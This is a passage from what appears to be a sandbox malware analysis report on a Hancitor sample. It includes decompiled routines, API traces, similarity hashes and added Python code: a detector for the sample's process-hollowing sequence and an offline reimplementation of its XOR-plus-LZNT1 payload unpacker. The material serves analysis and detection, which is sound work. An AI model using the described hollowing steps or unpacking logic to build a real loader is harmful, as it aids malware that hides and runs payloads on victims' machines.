                                                                                                                                                    Uniqueness Score: -1.00%
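The two decompiled functions above (E00612B60 driving the sequence, E006137C0 patching the child's PEB and thread context) are the tail end of a process-hollowing hand-off. What follows is an added example for this report, not code from the sample or from Joe Sandbox: it turns that call sequence into a behavioural check over an API trace. The trace format, the pids, the handle values and the target path C:\target.exe are constructed for the example; the argument positions follow the real Win32 prototypes, and the GetThreadContext check reads the ContextFlags value the trace prints for the CONTEXT argument, as the report's own API line (00010002) does.

```python
"""Behavioural signature for the process-hollowing hand-off decompiled above.

Added example for this report, not code from the sample or from Joe Sandbox.
It replays a small, constructed API trace (the line format below is invented
for the example; it is not the sandbox's own log format) and flags a caller
that walks the same sequence E00612B60 drives: create a suspended child, read
its primary thread context, write 4 bytes into the child (the PEB
ImageBaseAddress patch at EBX+8), set the context, resume.
"""
import re
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004            # dwCreationFlags bit for CreateProcess
CONTEXT_i386 = 0x00010000
CONTEXT_SUBFLAGS = [                     # low bits of the x86 CONTEXT.ContextFlags
    (0x01, "CONTEXT_CONTROL"),
    (0x02, "CONTEXT_INTEGER"),
    (0x04, "CONTEXT_SEGMENTS"),
    (0x08, "CONTEXT_FLOATING_POINT"),
    (0x10, "CONTEXT_DEBUG_REGISTERS"),
    (0x20, "CONTEXT_EXTENDED_REGISTERS"),
]
CONTEXT_INTEGER = CONTEXT_i386 | 0x02    # the 0x10002 seen in E006137C0

# Order in which the decompiled code drives the child. Every step must come
# from the same caller pid; a step with the wrong argument shape is ignored.
HOLLOW_SEQUENCE = (
    "CreateProcessW",      # suspended child
    "GetThreadContext",    # integer registers: EAX = entry point, EBX = PEB on x86
    "WriteProcessMemory",  # 4-byte write: PEB->ImageBaseAddress = new image base
    "SetThreadContext",    # EAX redirected to the injected image's entry point
    "ResumeThread",        # loader stub jumps to the new entry point
)

LINE_RE = re.compile(r"^(?P<pid>\d+)\s+(?P<api>\w+)\((?P<args>.*)\)\s*=\s*(?P<ret>\S+)$")


def to_int(token):
    """Parse a bare or 0x-prefixed hex argument; None for paths and blanks."""
    token = token.strip()
    if token.lower().startswith("0x"):
        token = token[2:]
    return int(token, 16) if re.fullmatch(r"[0-9a-fA-F]+", token) else None


def parse_line(line):
    """One constructed trace line -> dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    raw = m.group("args")
    return {
        "pid": int(m.group("pid")),
        "api": m.group("api"),
        "args": [a.strip() for a in raw.split(",")] if raw else [],
        "ret": m.group("ret"),
    }


def decode_context_flags(flags):
    """Names of the x86 CONTEXT sub-flags set in `flags` (empty if not CONTEXT_i386)."""
    if flags & CONTEXT_i386 != CONTEXT_i386:
        return []
    return [name for bit, name in CONTEXT_SUBFLAGS if flags & bit]


# Argument checks per step. Indices follow the real Win32 prototypes; the
# context checks read the ContextFlags value the trace prints for the CONTEXT*.
def _suspended(args):
    return len(args) > 5 and bool((to_int(args[5]) or 0) & CREATE_SUSPENDED)

def _integer_ctx(args):
    flags = to_int(args[1]) if len(args) > 1 else None
    return flags is not None and flags & CONTEXT_INTEGER == CONTEXT_INTEGER

def _four_byte_write(args):
    return len(args) > 3 and to_int(args[3]) == 4

STEP_CHECK = {
    "CreateProcessW": _suspended,
    "GetThreadContext": _integer_ctx,
    "WriteProcessMemory": _four_byte_write,
    "SetThreadContext": _integer_ctx,
    "ResumeThread": lambda args: len(args) >= 1,
}


def find_hollowing(trace_lines):
    """Return one finding per caller pid that completes HOLLOW_SEQUENCE in order."""
    state = defaultdict(lambda: {"stage": 0, "steps": []})
    findings = []
    for line in trace_lines:
        ev = parse_line(line)
        if ev is None:
            continue
        st = state[ev["pid"]]
        expected = HOLLOW_SEQUENCE[st["stage"]]
        if ev["api"] != expected or not STEP_CHECK[expected](ev["args"]):
            continue
        st["steps"].append(ev["api"])
        st["stage"] += 1
        if st["stage"] == len(HOLLOW_SEQUENCE):
            findings.append({"pid": ev["pid"], "steps": list(st["steps"])})
            state[ev["pid"]] = {"stage": 0, "steps": []}
    return findings


# Constructed trace: pid 4120 mirrors the decompiled sequence, pid 5200 is a
# benign launcher that never suspends its child and so must not be flagged.
CONSTRUCTED_TRACE = """\
4120 CreateProcessW(C:\\target.exe,,0,0,0,00000004,0,0,0019F8A0,0019F8D0) = 1
4120 GetThreadContext(000001D8,00010002) = 1
4120 WriteProcessMemory(000001DC,7FFDF008,00500000,00000004,00000000) = 1
4120 SetThreadContext(000001D8,00010002) = 1
4120 ResumeThread(000001D8) = 1
5200 CreateProcessW(C:\\other.exe,,0,0,0,00000000,0,0,0012F7A0,0012F7D0) = 1
5200 ResumeThread(000002F4) = 1
"""

if __name__ == "__main__":
    for hit in find_hollowing(CONSTRUCTED_TRACE.splitlines()):
        print(f"pid {hit['pid']}: process hollowing pattern, steps {hit['steps']}")
```

Run as a script it reports pid 4120 and nothing for pid 5200: the unsuspended CreateProcessW never opens a chain, so that caller's later ResumeThread is ignored. Keying on the caller pid rather than on handles keeps the check short but coarse; a production detector would tie the thread handle returned by CreateProcess to the later GetThreadContext, SetThreadContext and ResumeThread calls and require the WriteProcessMemory target to fall inside the child's PEB.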

                                                                                                                                                    APIs
                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 0066764B
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00667657
                                                                                                                                                      • Part of subcall function 00667700: CloseHandle.KERNEL32(006A99C0,0066774A,?,00666409,?,00000001,?,00000001,?,00664B5E,00000000,?,00000001,00000000,00000001), ref: 00667710
                                                                                                                                                    • ___initconout.LIBCMT ref: 00667667
                                                                                                                                                      • Part of subcall function 006676C2: CreateFileW.KERNEL32(00694B74,40000000,00000003,00000000,00000003,00000000,00000000,006676F1,006663F6,00000001,?,00664B5E,00000000,?,00000001,00000000), ref: 006676D5
                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 0066767B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                    • Opcode ID: 99e7b9a599d5283a0df5e08bb79ba5fede4e755aea57356cc112cb8a74e1aba6
                                                                                                                                                    • Instruction ID: f339a806e88083f2c0bb19f210ce8960da8d90dce6f68f9f5fa587a816ac0fb9
                                                                                                                                                    • Opcode Fuzzy Hash: 99e7b9a599d5283a0df5e08bb79ba5fede4e755aea57356cc112cb8a74e1aba6
                                                                                                                                                    • Instruction Fuzzy Hash: D5F0FE36104601BFCB622B9ADC089467FA7FB89761B555419F59982530CE32A851DF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,0065CDC4,00000000,?,?,00666409,?,00000001,?,00000001,?,00664B5E,00000000,?,00000001), ref: 0066772E
                                                                                                                                                    • GetLastError.KERNEL32(?,00666409,?,00000001,?,00000001,?,00664B5E,00000000,?,00000001,00000000,00000001,?,006650C3,0065CB6B), ref: 0066773A
                                                                                                                                                      • Part of subcall function 00667700: CloseHandle.KERNEL32(006A99C0,0066774A,?,00666409,?,00000001,?,00000001,?,00664B5E,00000000,?,00000001,00000000,00000001), ref: 00667710
                                                                                                                                                    • ___initconout.LIBCMT ref: 0066774A
                                                                                                                                                      • Part of subcall function 006676C2: CreateFileW.KERNEL32(00694B74,40000000,00000003,00000000,00000003,00000000,00000000,006676F1,006663F6,00000001,?,00664B5E,00000000,?,00000001,00000000), ref: 006676D5
                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,0065CDC4,00000000,?,00666409,?,00000001,?,00000001,?,00664B5E,00000000,?,00000001,00000000), ref: 0066775F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                    • Opcode ID: 9dbd321b92a71ff442739a5e66a54e120d5bcef84d741e89001fb9dba3457280
                                                                                                                                                    • Instruction ID: 35e2cf067cb102a5a358930b7c7354032ca8da7238459e5cbe8521e4897df719
                                                                                                                                                    • Opcode Fuzzy Hash: 9dbd321b92a71ff442739a5e66a54e120d5bcef84d741e89001fb9dba3457280
                                                                                                                                                    • Instruction Fuzzy Hash: 14F0C936905219BFCF622F95DC08A9A3F27FB097A5F545114FE1896230CA329920DFE4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free
                                                                                                                                                    • String ID: -
                                                                                                                                                    • API String ID: 269201875-2547889144
                                                                                                                                                    • Opcode ID: 0e6801b890b216fbe3dfe40953a766bbcb3b026a37ce68e05ad28b22223c40bb
                                                                                                                                                    • Instruction ID: 5a384bec653da9e85ad9086748cf290d4a41dac7893d6de5198e60836663bd68
                                                                                                                                                    • Opcode Fuzzy Hash: 0e6801b890b216fbe3dfe40953a766bbcb3b026a37ce68e05ad28b22223c40bb
                                                                                                                                                    • Instruction Fuzzy Hash: A2C1E171D002169ADF64AF64CC41BEA73BBEF15714F1440AEE905A7381EB71DE85CB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                                    • String ID: +$-
                                                                                                                                                    • API String ID: 1302938615-2137968064
                                                                                                                                                    • Opcode ID: 3cc04fdda4eed2840bf348f5c288387c1a3f141f6f1c321de9e830a82e15bed4
                                                                                                                                                    • Instruction ID: 45fbc8c5cc5c0d70c36f54c3e849467ac4cb3ca3a86b2c984c431a181f06e9a3
                                                                                                                                                    • Opcode Fuzzy Hash: 3cc04fdda4eed2840bf348f5c288387c1a3f141f6f1c321de9e830a82e15bed4
                                                                                                                                                    • Instruction Fuzzy Hash: 4B910530D042499FDF25CF68D8906FEBBF3EF51320F14826AE871A7392D67099068B91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0062F1A3
                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0062F25C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                    • String ID: csm
                                                                                                                                                    • API String ID: 3480331319-1018135373
                                                                                                                                                    • Opcode ID: 1b7d3e40905dd3036929ba6f3727841ad59fce390427ada4078b55f2c934ab4f
                                                                                                                                                    • Instruction ID: 6e903627e82faea63a7ca1c31249582c23e3a359d553e277fef56f75021be77d
                                                                                                                                                    • Opcode Fuzzy Hash: 1b7d3e40905dd3036929ba6f3727841ad59fce390427ada4078b55f2c934ab4f
                                                                                                                                                    • Instruction Fuzzy Hash: 33410134E01628DBCF10DFA8E844ADEBBB6AF46314F148179E8156B352D7319E15CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog3___cftoe
                                                                                                                                                    • String ID: !%x
                                                                                                                                                    • API String ID: 855520168-1893981228
                                                                                                                                                    • Opcode ID: 9bb46d13d8fc20098614fde50dfe97496352f0fdb08c52e27c679da382d2ea06
                                                                                                                                                    • Instruction ID: f089c2464f327cfce30e8179c8056a1767b66554f93cdbcc8b57bd767dbaad94
                                                                                                                                                    • Opcode Fuzzy Hash: 9bb46d13d8fc20098614fde50dfe97496352f0fdb08c52e27c679da382d2ea06
                                                                                                                                                    • Instruction Fuzzy Hash: 32214835D01259EBCF04DF90E981AEEBBB6BF48304F104119F915A7241E7756A16CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog3___cftoe
                                                                                                                                                    • String ID: !%x
                                                                                                                                                    • API String ID: 855520168-1893981228
                                                                                                                                                    • Opcode ID: 918de267cd4bec048f804b69e80d69839dd3b877330a440ece2c9daecc3a5f4c
                                                                                                                                                    • Instruction ID: df082c59533e490263d5ce95cc1e88d69a6a73bd5b526a4765587f9d27daf413
                                                                                                                                                    • Opcode Fuzzy Hash: 918de267cd4bec048f804b69e80d69839dd3b877330a440ece2c9daecc3a5f4c
                                                                                                                                                    • Instruction Fuzzy Hash: 50216B31911269EFDF01DF94EC41AEEBBB2BF69300F184059F9416B242D7755A09CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
			E00611D20(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				// _a4 : in/out buffer, the first 8 bytes are the XOR key, the rest is LZNT1 data
				// _a8 : total length of that buffer
				// _a12: size of the scratch buffer allocated for the inflated output
				signed int _v8;
				void* _v12;
				long _v16;
				char _v20;
				void* _t33;
				void* _t66;
				void* _t67;
				char* _t1;   // decompiler temporaries, declared here so the listing reads as C
				char* _t19;
				char* _t22;
				char* _t26;
				char* _t31;

				_t1 =  &_a12; // 0x61234a
				_t33 = E00611390( *_t1); // heap allocation wrapper (GetProcessHeap + RtlAllocateHeap, see APIs below)
				_t67 = _t66 + 4;
				_v12 = _t33;
				_v8 = 8;
				// In-place decryption: every byte after the 8-byte header is XORed with the
				// key byte at (index mod 8); the key bytes 0..7 themselves are left untouched.
				while(_v8 < _a8) {
					 *(_a4 + _v8) =  *(_a4 + _v8) ^  *(_a4 + _v8 % 8);
					_v8 = _v8 + 1;
				}
				_t19 =  &_v20; // 0x61234a
				_t22 =  &_a12; // 0x61234a
				// RtlDecompressBuffer(COMPRESSION_FORMAT_LZNT1 = 2, out, out_size,
				//                     in = _a4 + 8, in_size = _a8 - 8, &final_size)
				_v16 = RtlDecompressBuffer(2, _v12,  *_t22, _a4 + 8, _a8 - 8, _t19);
				if(_v16 == 0) { // NTSTATUS 0 == STATUS_SUCCESS
					_t26 =  &_v20; // 0x61234a
					E00611450(_a4, _v12,  *_t26); // (dst, src, len): presumably copies the inflated bytes back over the input buffer
					_t67 = _t67 + 0xc;
				}
				E006113D0(_v12); // presumably releases the scratch buffer
				if(_v16 != 0) {
					return 0; // decompression failed
				}
				_t31 =  &_v20; // 0x61234a
				return  *_t31; // number of inflated bytes now sitting at _a4
			}

                                                                                                                                                    Statement addresses listed beside the C code above (0x00000000 marks the decompiler's return placeholders): 0x00611d26, 0x00611d2a, 0x00611d2f, 0x00611d32, 0x00611d35, 0x00611d47, 0x00611d73, 0x00611d44, 0x00611d44, 0x00611d77, 0x00611d89, 0x00611d99, 0x00611da0, 0x00611da2, 0x00611dae, 0x00611db3, 0x00611db3, 0x00611dba, 0x00611dc6, 0x00000000, 0x00611dcd, 0x00611dc8, 0x00000000

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00611390: GetProcessHeap.KERNEL32(?,00611886,00100000), ref: 0061139C
                                                                                                                                                      • Part of subcall function 00611390: RtlAllocateHeap.NTDLL(01380000,00000000,00611886,?,00611886,00100000), ref: 006113BD
                                                                                                                                                    • RtlDecompressBuffer.NTDLL(00000002,?,J#a,?,004FFFF8,J#a), ref: 00611D93
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$AllocateBufferDecompressProcess
                                                                                                                                                    • String ID: J#a$J#a
                                                                                                                                                    • API String ID: 2896260840-2386348796
                                                                                                                                                    • Opcode ID: 773e64657e8491cb779398e84687d0bc9d97e56eaad174b309be9195b8d597b2
                                                                                                                                                    • Instruction ID: a24b674c71a751f5db9ced4457a9f2f954f4d7925bed0f458a87bc509d2c165d
                                                                                                                                                    • Opcode Fuzzy Hash: 773e64657e8491cb779398e84687d0bc9d97e56eaad174b309be9195b8d597b2
                                                                                                                                                    • Instruction Fuzzy Hash: 74214F70E04148EFCB04DF98D891AFEB7B6EF49304F18859CFA199B341D634AA80CB55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
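Re-implementation of E00611D20 for offline payload extraction, added here as an example; it is not part of the Joe Sandbox report or of the sample's own code. The decompiled routine treats the first 8 bytes of the buffer as an XOR key, XORs every following byte with key[i mod 8], and passes the result to RtlDecompressBuffer with format 2 (COMPRESSION_FORMAT_LZNT1). Two details from the API list above matter when writing detections: the recorded compressed size 0x4FFFF8 is a 0x500000-byte buffer minus the 8-byte key, and the string "J#a" is only the ASCII rendering of the value 0x0061234a from the decompiler's annotations, not a string literal in the sample. The Python below carries a pure-Python LZNT1 decoder so it runs without ntdll; the test vector, the key and the helper names (hancitor_unpack, hancitor_pack, lznt1_decompress) are constructed for this example.

```python
"""XOR-then-LZNT1 unpacker mirroring the decompiled E00611D20 routine.
Added example, not code from the sample or from Joe Sandbox."""
import struct
from typing import Optional


def lznt1_decompress(data: bytes) -> bytes:
    """Pure-Python LZNT1 (COMPRESSION_FORMAT_LZNT1 == 2) decoder.

    Mirrors what RtlDecompressBuffer(2, ...) does: the input is a series of
    chunks, each with a 16-bit little-endian header whose low 12 bits hold
    (payload size - 1) and whose top bit says whether the payload is
    compressed.  A compressed payload is a run of flag bytes, each followed
    by up to 8 tokens: a literal byte (flag bit clear) or a 16-bit
    back-reference (flag bit set) whose offset/length split depends on how
    much of the current chunk has already been produced.
    """
    out = bytearray()
    i = 0
    while i + 2 <= len(data):
        hdr = struct.unpack_from("<H", data, i)[0]
        i += 2
        if hdr == 0:                      # a zero header terminates the stream
            break
        size = (hdr & 0x0FFF) + 1
        chunk = data[i:i + size]
        i += size
        if not hdr & 0x8000:              # stored (uncompressed) chunk
            out += chunk
            continue
        chunk_base = len(out)             # back-references never reach before the chunk
        j = 0
        while j < len(chunk):
            flags = chunk[j]
            j += 1
            for bit in range(8):
                if j >= len(chunk):
                    break
                if not (flags >> bit) & 1:
                    out.append(chunk[j])
                    j += 1
                    continue
                if j + 1 >= len(chunk):
                    raise ValueError("truncated back-reference token")
                token = struct.unpack_from("<H", chunk, j)[0]
                j += 2
                # The length field shrinks (and the offset field grows) as the
                # position inside the chunk increases, exactly as in ntdll.
                pos = len(out) - chunk_base - 1
                l_mask, o_shift = 0x0FFF, 12
                while pos >= 0x10:
                    l_mask >>= 1
                    o_shift -= 1
                    pos >>= 1
                length = (token & l_mask) + 3
                offset = (token >> o_shift) + 1
                if offset > len(out) - chunk_base:
                    raise ValueError("back-reference points before chunk start")
                for _ in range(length):   # byte-wise copy handles overlapping runs
                    out.append(out[-offset])
    return bytes(out)


def hancitor_unpack(blob: bytes) -> Optional[bytes]:
    """Equivalent of E00611D20: XOR bytes 8.. with key = blob[0:8], then inflate.
    Returns None where the decompiled routine returns 0 (decompression failed)."""
    if len(blob) <= 8:
        return None
    key = blob[:8]
    body = bytes(b ^ key[i % 8] for i, b in enumerate(blob[8:]))
    try:
        return lznt1_decompress(body)
    except (ValueError, struct.error):
        return None


def hancitor_pack(compressed: bytes, key: bytes) -> bytes:
    """Inverse of the XOR layer only (no compressor here): prepend the 8-byte
    key and XOR an already LZNT1-compressed body with it."""
    assert len(key) == 8
    return key + bytes(b ^ key[i % 8] for i, b in enumerate(compressed))


# Constructed test vector: one LZNT1 chunk encoding b"ABCDABCDABCDEF".
# Header 0xB008 (compressed, 9-byte payload), flags 0x10 (token 4 is a
# back-reference), literals A B C D, token 0x3005 = offset 4 / length 8, literals E F.
SAMPLE_LZNT1 = b"\x08\xb0\x10ABCD\x05\x30EF"
SAMPLE_KEY = b"\x13\x37\xde\xad\xbe\xef\x00\x01"   # constructed, not taken from the sample
SAMPLE_BLOB = hancitor_pack(SAMPLE_LZNT1, SAMPLE_KEY)

if __name__ == "__main__":
    print(hancitor_unpack(SAMPLE_BLOB))   # b'ABCDABCDABCDEF'
```

Feed hancitor_unpack the buffer as it sits in memory before the routine runs (key still in the first 8 bytes). A wrong key usually trips the truncation checks and yields None, which is the same failure path as the `return 0` above, but the reliable success test is that the result starts with a PE header, since the report classifies the inflated stage as the Hancitor payload.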